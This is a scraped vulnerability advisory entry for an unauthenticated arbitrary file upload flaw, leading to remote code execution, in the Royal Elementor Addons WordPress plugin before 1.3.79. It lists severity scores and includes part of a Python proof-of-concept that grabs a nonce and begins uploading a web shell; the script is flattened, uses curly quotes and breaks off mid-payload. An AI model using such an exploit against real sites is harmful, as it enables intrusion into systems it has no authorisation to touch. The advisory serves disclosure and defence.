Lucene search

K
wpvulndbFioravante SouzaWPVDB-ID:281518FF-7816-4007-B712-63AED7828B34
HistoryOct 09, 2023 - 12:00 a.m.

Royal Elementor Addons and Templates < 1.3.79 - Unauthenticated Arbitrary File Upload

2023-10-0900:00:00
Fioravante Souza
wpscan.com
16
elementor
templates
unauthenticated upload
arbitrary file
rce

9.6 High

AI Score

Confidence

High

0.911 High

EPSS

Percentile

98.9%

Description The plugin does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.

PoC

Make sure you have Elementor installed and a page or post edited with Elementor. Here’s the python script that will execute the exploit. from io import StringIO import requests from urllib import parse import json import sys import re import io if len(sys.argv) != 2: print(‘USAGE: python %s ’ % (sys.argv[0],)) sys.exit() elementor_url = sys.argv[1].rstrip(’/‘) parsed_url = parse.urlparse(elementor_url) root_url = f’{parsed_url.scheme}://{parsed_url.netloc}’ with requests.Session() as s: print(‘# Getting nonce…’) page = s.get(elementor_url).text nonce = re.search(r’WprConfig = \{.*“nonce”:“([a-f0-9]+)”‘, page).groups() if len(nonce) == 0: print(‘Error: Couldn't get nonce.’) sys.exit() nonce = nonce[0] print(’# Uploading shell…‘) shell = io.BytesIO(b’

CPENameOperatorVersion
eq1.3.79

9.6 High

AI Score

Confidence

High

0.911 High

EPSS

Percentile

98.9%